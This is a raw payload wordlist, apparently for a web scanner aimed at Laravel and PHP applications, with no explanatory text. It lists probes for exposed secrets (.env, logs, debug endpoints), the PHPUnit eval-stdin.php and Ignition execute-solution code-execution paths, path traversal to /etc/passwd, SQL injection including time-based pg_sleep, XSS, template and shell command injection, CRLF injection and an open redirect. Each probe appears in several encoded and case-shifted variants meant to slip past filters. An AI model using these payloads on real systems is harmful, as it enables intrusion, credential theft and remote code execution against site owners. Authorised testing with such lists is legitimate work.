/.env
/_ignition/health-check
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/storage/logs/laravel.log
/telescope/requests
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2F.env
%2F_ignition%2Fhealth-check
%2Fvendor%2Fphpunit%2Fphpunit%2Fsrc%2FUtil%2FPHP%2Feval-stdin.php
%2Fstorage%2Flogs%2Flaravel.log
%2Ftelescope%2Frequests
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
/.ENV
/_IGNITION/HEALTH-CHECK
/VENDOR/PHPUNIT/PHPUNIT/SRC/UTIL/PHP/EVAL-STDIN.PHP
/STORAGE/LOGS/LARAVEL.LOG
/TELESCOPE/REQUESTS
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2F.ENV
%2F_IGNITION%2FHEALTH-CHECK
%2FVENDOR%2FPHPUNIT%2FPHPUNIT%2FSRC%2FUTIL%2FPHP%2FEVAL-STDIN.PHP
%2FSTORAGE%2FLOGS%2FLARAVEL.LOG
%2FTELESCOPE%2FREQUESTS
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
/.env?v=0
/.env&v=0
%2F.env_0
laravel_0
/laravel/0
/.env%0a0
/_ignition/health-check?v=1
/_ignition/health-check&v=1
%2F_ignition%2Fhealth-check_1
laravel_1
/laravel/1
/_ignition/health-check%0a1
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?v=2
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php&v=2
%2Fvendor%2Fphpunit%2Fphpunit%2Fsrc%2FUtil%2FPHP%2Feval-stdin.php_2
laravel_2
/laravel/2
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php%0a2
/storage/logs/laravel.log?v=3
/storage/logs/laravel.log&v=3
%252F.env
/.env?aurose=1
/.env&aurose=1
/.env.bak
/.env.old
%252F_ignition%252Fhealth-check
/_ignition/health-check?aurose=1
/_ignition/health-check&aurose=1
/_ignition/health-check.bak
/_ignition/health-check.old
/_ignition/execute-solution
%2F_ignition%2Fexecute-solution
%252F_ignition%252Fexecute-solution
/_IGNITION/EXECUTE-SOLUTION
/_ignition/execute-solution?aurose=1
/_ignition/execute-solution&aurose=1
/_ignition/execute-solution.bak
/_ignition/execute-solution.old
%252Fstorage%252Flogs%252Flaravel.log
/storage/logs/laravel.log?aurose=1
/storage/logs/laravel.log&aurose=1
/storage/logs/laravel.log.bak
/storage/logs/laravel.log.old
%252Fvendor%252Fphpunit%252Fphpunit%252Fsrc%252FUtil%252FPHP%252Feval-stdin.php
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?aurose=1
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php&aurose=1
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.bak
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.old
%252Ftelescope%252Frequests
/telescope/requests?aurose=1
/telescope/requests&aurose=1
/telescope/requests.bak
/telescope/requests.old
/horizon/api/stats
%2Fhorizon%2Fapi%2Fstats
%252Fhorizon%252Fapi%252Fstats
/HORIZON/API/STATS
/horizon/api/stats?aurose=1
/horizon/api/stats&aurose=1
/horizon/api/stats.bak
/horizon/api/stats.old
/_debugbar/open
%2F_debugbar%2Fopen
%252F_debugbar%252Fopen
/_DEBUGBAR/OPEN
/_debugbar/open?aurose=1
/_debugbar/open&aurose=1
/_debugbar/open.bak
/_debugbar/open.old
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
/.env::var0
%2F.env::v0
/laravel/probe/0
/_ignition/health-check::var1
%2F_ignition%2Fhealth-check::v1
/laravel/probe/1
/_ignition/execute-solution::var2
%2F_ignition%2Fexecute-solution::v2
/laravel/probe/2
/storage/logs/laravel.log::var3
%2Fstorage%2Flogs%2Flaravel.log::v3
/laravel/probe/3
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php::var4
%2Fvendor%2Fphpunit%2Fphpunit%2Fsrc%2FUtil%2FPHP%2Feval-stdin.php::v4
/laravel/probe/4
/telescope/requests::var5
%2Ftelescope%2Frequests::v5
/laravel/probe/5
/horizon/api/stats::var6
%2Fhorizon%2Fapi%2Fstats::v6
/laravel/probe/6
/_debugbar/open::var7
%2F_debugbar%2Fopen::v7
/laravel/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/laravel/probe/8
" OR "1"="1::var9
%22%20OR%20%221%22%3D%221::v9
/laravel/probe/9
' AND 1=1 --::var10
%27%20AND%201%3D1%20--::v10
/laravel/probe/10
' AND 1=2 --::var11
%27%20AND%201%3D2%20--::v11
/laravel/probe/11
